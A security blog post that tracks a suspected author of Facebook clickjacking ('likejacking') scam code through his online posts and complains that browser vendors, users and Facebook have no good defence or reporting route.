Recently I got an email from one of my readers - he analyzed the actual code used in an attack, did some googling around for snippets of it and he found the person that is (supposedly, we have no proof yet) the code author of recent attacks. Meet bhav - and tremble before his mighty coder skills!
Meanwhile, bhav is into reverse engineering and learns about JS packers:
|Help understanding symbols|
Let's recap. We have a guy who wants to hide an iframe, messes up with some site link-sharing code and learns about timeouts used to change the DOM. Nothing extra suspicious, right? But what about this:
|Google Chrome redirect|
the share.php iframe and the usage of lpcAutoLike() function? You're being naughty, bhav!
An icing on a cake is he's launching a fan page:
|Facebook fan page|
- browser vendors - they will probably not "fix" clickjacking as it is not a bug, but a flaw in web itself
- Facebook users - having no easy way to be protected apart from NoScript
- appsec guys - sure, I can spend a day analyzing Facebook scams like I did before, but it's the same everytime and no fun either
- Facebook - reporting this to Facebook doesn't do any good, there is even no abuse@ address, and I found no way to report this after spending 15 minutes in their UI, so I gave up. The most a user can do is to mark an individual scam URL as "spam", but new sites with same code are being launched daily. Facebook, please make a policy on how to report these...
It's just not right and I have no idea how to make it better apart from publishing these posts.
P.S. On the up-side, I've just found some nice info about the other guy I've reported recently:
koto@xps:~$ whois -------------.info | grep -i '\(email\|server\)' | head -n 5 Registrant Email:------------email@example.com Admin Email:------------firstname.lastname@example.org Billing Email:------------email@example.com Tech Email:------------firstname.lastname@example.org Name Server:NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM